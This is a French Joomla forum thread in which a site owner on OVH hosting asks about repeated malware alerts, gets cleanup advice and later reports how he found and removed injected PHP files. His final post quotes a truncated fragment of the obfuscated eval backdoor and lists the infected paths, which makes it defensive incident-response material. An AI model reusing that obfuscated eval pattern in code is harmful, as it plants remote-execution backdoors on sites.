Hébergement OVH, alerte de sécurité

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Hébergement OVH, alerte de sécurité

    Bonjour,

    depuis quelques semaines, j'ai constamment des message de la part d'OVH concernant mon site web en Joomla 2.5.
    Ils me ferment mon site car j'ai des scripts qui s'exécutent. Apparemment, j'ai un souci de sécurité mais je n'arrive pas à trouver lequel.
    J'ai fait des mises à jours de Joomla! et de plugins/extensions sans succès.

    Est ce que vous avez déjà eu ce cas là ? Est ce que vous avez une idée ?

    Ci-dessous un exemple de message et de script incriminé.
    Il y en a eu plusieurs et toujours le même type de script mais pas la même arborescence.

    Merci de votre aide, je suis dans une impasse.

    Cordialement,

    Throdo

    Bonjour,

    Notre système de surveillance (Okillerd) a détecté une opération
    irrégulière au niveau de votre site.

    Les détails de cette opération sont les suivants :

    xxxxxxxxxx.fr

    Problème rencontré : Executing deleted program
    Commande apparente : ././ps
    Exécutable utilisé : /homez.565/xxxxxxx/www/update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package/modules/mod_finder/tmpl/.nfs0000000008bcd314000053ce
    Horodatage: 2014-12-30 14:45:10

    Ceci n'est pas autorisé sur nos installations,
    car c'est une tentative potentielle de piratage.

    Si ce n'est pas vous qui avez lancé ce script, cela signifie
    qu'il y a une faille sur votre site et qu'un hacker s'en
    est servi pour réaliser cette opération.

    ou autre exemple de script :
    Problème rencontré : Executing deleted program
    Commande apparente : ././ps
    Exécutable utilisé : /homez.565/xxxxxxxx/www/components/com_jce/editor/tiny_mce/plugins/.nfs00000000049bf0af00000c6b
    Horodatage: 2014-12-30 04:10:04

    Dernière édition par Throdo à 25/01/2015, 22h39 Raison: le problème est réglé :)

  • #2
    Re : Hébergement OVH, alerte de sécurité

    Bonjour,

    dans ce cas de site piraté, il n'y a pas d'autre solution que de remonter une sauvegarde saine, ou d'inspecter minutieusement les fichier pour trouver et corriger la faille.
    Pour apprendre à construire votre site web avec Joomla 3 : Joomla3! Le Livre Pour Tous : http://cinnk.com/joomla/3/le-livre-pour-tous

    Référencement Joomla! 10 astuces pour référencer son site web https://cinnk.com/articles/referencement-joomla-10-astuces-pour-referencer-son-site-web

    Créez votre boutique en ligne avec Joomla! & HikaShop http://cinnk.com/boutique/livres/cre...la-et-hikashop

    Commentaire


    • #3
      Re : Hébergement OVH, alerte de sécurité

      Bonsoir,
      et au passage, je comprends mal pourquoi tu as laisser des bout de code d'un joomla dezippé dans "update"
      www/update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package
      Sinon, une chose est sure ... ton site s'est fait hacké et en general, ça laisse PLUSIEURS portes ouvertes pour que les malveillants puissent revenir ...
      Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
      Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

      Commentaire


      • #4
        Re : Hébergement OVH, alerte de sécurité

        Bonjour

        Je lis que tu as mis à jour (voulu mettre à jour) Joomla! : c'est une excellente initiative mais ce n'est pas assez. Les pirates qui cherchent à exploiter les ressources de ton serveur modifient en effet des fichiers natifs mais, surtout, en déposent d'autres. Et là, que tu mettes à jour ou pas, ces fichiers -inconnus de Joomla!- ne sont pas modifiés et restent donc en place.

        A te lire, tu as aussi des vieux fichiers qui trainent (/update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package), il faudrait donc faire un joli nettoyage de ton site et de tes fichiers.

        Cela ne peut se faire qu'en local, après avoir téléchargé une version de ton site "en l'état" après l'avoir nettoyer. Pour cela, compte plusieurs heures de travail parce qu'il n'y a pas de recettes miraculeuses, c'est souvent manuel. Tu vas t'épargner un gros travail en supprimant (en local!!!!!!), tous les dossiers de Joomla excepté /images et /media et en remettant une version fraiche de Joomla, de ton template, des modules, composants, ... que tu utilises. C'est la meilleure manière de procéder mais comme tu les comprends, elle prend un certain temps.

        Restera les dossiers /images et /medias qu'il faudra traiter manuellement pour en extraire les codes virusés.

        Bonne journée et excellent réveillon.
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Re : Hébergement OVH, alerte de sécurité

          Bonjour,

          Merci pour vos réponses et vos conseils.

          Est ce que vous pensez que la base de données peut elle aussi comporter des "sql injections" et donc aussi d'être infecté.
          Ne serait-ce pas le moment d'en profiter pour migrer vers la version 3 de Joomla! ?

          autre question, est ce que je dois considérer que j'ai fait une mauvaise utilisation de Joomla! ou alors est ce que Joomla! a des failles qui sont connues des pirates ?

          Merci et bonne année.

          Commentaire


          • #6
            Re : Hébergement OVH, alerte de sécurité

            Bonjour,


            Est ce que vous pensez que la base de données peut elle aussi comporter des "sql injections" et donc aussi d'être infecté.
            Oui, cela est possible.


            Ne serait-ce pas le moment d'en profiter pour migrer vers la version 3 de Joomla! ?
            Ce serait en effet une bonne idée, la version 2.5 de Joomla! n'est désormais plus supportée.


            autre question, est ce que je dois considérer que j'ai fait une mauvaise utilisation de Joomla! ou alors est ce que Joomla! a des failles qui sont connues des pirates ?
            Joomla! est un système fiable et sécurisé, à partir du moment où il est à jour et que les extensions installées le sont également.
            Ensuite, il est important d'avoir des mots de passe solides (FTP connexion au panneau d'admin de l'hébergeur, connexion à Joomla!) et également d'avoir un ordinateur propre.

            Ensuite, il est également possible d'accroitre la sécurité de Joomla!, par exemple en utilisant une extension comme aeSecure :
            Pour apprendre à construire votre site web avec Joomla 3 : Joomla3! Le Livre Pour Tous : http://cinnk.com/joomla/3/le-livre-pour-tous

            Référencement Joomla! 10 astuces pour référencer son site web https://cinnk.com/articles/referencement-joomla-10-astuces-pour-referencer-son-site-web

            Créez votre boutique en ligne avec Joomla! & HikaShop http://cinnk.com/boutique/livres/cre...la-et-hikashop

            Commentaire


            • #7
              Re : Hébergement OVH, alerte de sécurité

              Envoyé par Throdo Voir le message
              Bonjour,

              Merci pour vos réponses et vos conseils.

              Est ce que vous pensez que la base de données peut elle aussi comporter des "sql injections" et donc aussi d'être infecté.
              Ne serait-ce pas le moment d'en profiter pour migrer vers la version 3 de Joomla! ?

              autre question, est ce que je dois considérer que j'ai fait une mauvaise utilisation de Joomla! ou alors est ce que Joomla! a des failles qui sont connues des pirates ?

              Merci et bonne année.
              Non je ne pense pas, c'est finalement assez rare des sql injections, on a plus affaire à des utilisations frauduleuses de ressources.

              Non, tu n'as pas fait une mauvaise utilisation, juste, je vois que tu es inscrit depuis 2008 et seulement 9 posts depuis... Ce qui signifie que tu n'as pas tellement suivi l'actu Joomla. Le fait que cela soit un open source demande de se maintenir à jour car les plans de la citadelle sont accessibles... gratuitement pour tous hacker compris

              Bonne année 2015
              Christophe
              http://www.webcrea.fr

              Commentaire


              • #8
                Re : Hébergement OVH, alerte de sécurité

                Je confirme aussi que les SQL Injections, dans le sens "code malveillant se trouvant dans la base de données", c'est assez rare. On parle ici p.ex. de IFRAME qui seraient dans des articles.

                Maintenant, SQL injections n'est pas restreint à ça; tu peux exploiter les données par des queries (select * from users p.ex.) ou créer de nouveaux utilisateurs (insert into ...). Regarde donc si tu as p.ex. des nouveaux admins indésirables.

                Reste maintenant à, oui, protéger ton site, à en restreindre autant que faire se peu son accès frauduleux, non désiré. Il y a des logiciels de type firewall (parefeu) qui vise à cette protection. Tu dois aussi choisir un hébergeur sérieux, conscient de la sécurisation de ses clients et, enfin, adopter une attitude sécuritaire de ton côté (un exemple : ne pas installer n'importe quoi, provenant de n'importe où).

                Bonne soirée.
                Christophe (cavo789)
                Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                Commentaire


                • #9
                  Re : Hébergement OVH, alerte de sécurité

                  Bonjour, c'est maintenant réglé depuis quelques jours le site est en ligne et il n'y a plus de soucis.
                  Je partage avec vous ce que j'ai fait.

                  J'ai tout d'abord mise à jour les plugins, modules ainsi que la version de Joomla! pour être le plus à jour possible.
                  Par contre les soucis ont quand même continués car des fichiers avaient été changés par des injections de code php.

                  J'ai donc regardé les logs du serveurs pour avoir des infos sur les modules et les plugins touchés par les hackers.

                  [30/Dec/2014:14:41:36 +0100] "POST /components/com_joomgallery/models/image.php HTTP/1.1" 200 71 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
                  [30/Dec/2014:14:41:37 +0100] "POST /update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package/modules/mod_finder/tmpl/ini.php HTTP/1.1" 200 82 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
                  J'ai réussi, en inspectant les répertoires de mon site que j'avais descendu sur mon ordinateur perso, à trouver un répertoire nommé 'js' avec un fichier php dedans. Ce qui m'a paru suspect. Effectivement le contenu l'était !

                  Voici un bout du code du fichier qui se trouvait entre autre entre des balise php.
                  ... PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n79c1ec'])) {eval($s21(${$s20}['n79c1ec' ...
                  Après quelques commandes grep sur des mots clés comme "PCT4BA6ODSE_" ou "n79c1ec", j'ai isolé un certain nombres de fichiers dont voici la liste :

                  ./components/com_easybookreloaded/models/ajax.php
                  ./components/com_jce/editor/tiny_mce/plugins/dirs.php
                  ./components/com_jce/media/img/stats.php
                  ./components/com_joomgallery/views/report/diff.php
                  ./components/com_weblinks/models/forms/ajax.php
                  ./components/com_wrapper/views/wrapper/view.html.php
                  ./images/Trombinoscope/Photos_soumises/sql.php
                  ./libraries/cms/form/field/menu.php
                  ./libraries/gjfields/article.php
                  ./libraries/joomla/database/database/db.php
                  ./libraries/joomla/html/language/alias.php
                  ./libraries/kunena/forum/statistics.php
                  ./libraries/kunena/pagination/pagination.php
                  ./libraries/syw/fields/title.php
                  ./media/kunena/js/bootstrap/xml.php
                  ./media/media/images/title.php
                  ./media/media/js/session.php
                  ./media/system/images/modal/press.php
                  ./modules/mod_banners/helper.php
                  ./modules/mod_dn/model.php
                  ./modules/mod_trombinoscope/helper.php
                  ./plugins/content/jw_allvideos/jw_allvideos/css.php
                  ./plugins/content/notifyarticlesubmit/language/en-GB/files.php
                  ./plugins/editors/jckeditor/plugins/readmore/help.php
                  ./plugins/system/log/log.php
                  ./templates/atomic/html/mod_menu/default.php
                  ./tmp/install_522fc288771f6/language/spanish.php
                  ./tmp/install_522fc2cb23789/language/dutch.php

                  Que j'ai nettoyé soit des balises en entête du fichier soit du fichier car il n'avait pas sa place.

                  Depuis, plus rien.

                  Merci de votre aide, peut être que ça peut aider quelqu'un d'autre d'où mon partage.

                  Commentaire


                  • #10
                    Re : Hébergement OVH, alerte de sécurité

                    Merci pour ton retour car oui, cela peut intéresser certaines personnes dans le même cas et qui auraient les mêmes compétences que toi pour faire ce nettoyage.

                    (Tu penses à passer ton post en Réglé ?)

                    Merci
                    Christophe (cavo789)
                    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                    Commentaire

                    Annonce

                    Réduire
                    Aucune annonce pour le moment.

                    Partenaire de l'association

                    Réduire

                    Hébergeur Web PlanetHoster
                    Travaille ...
                    X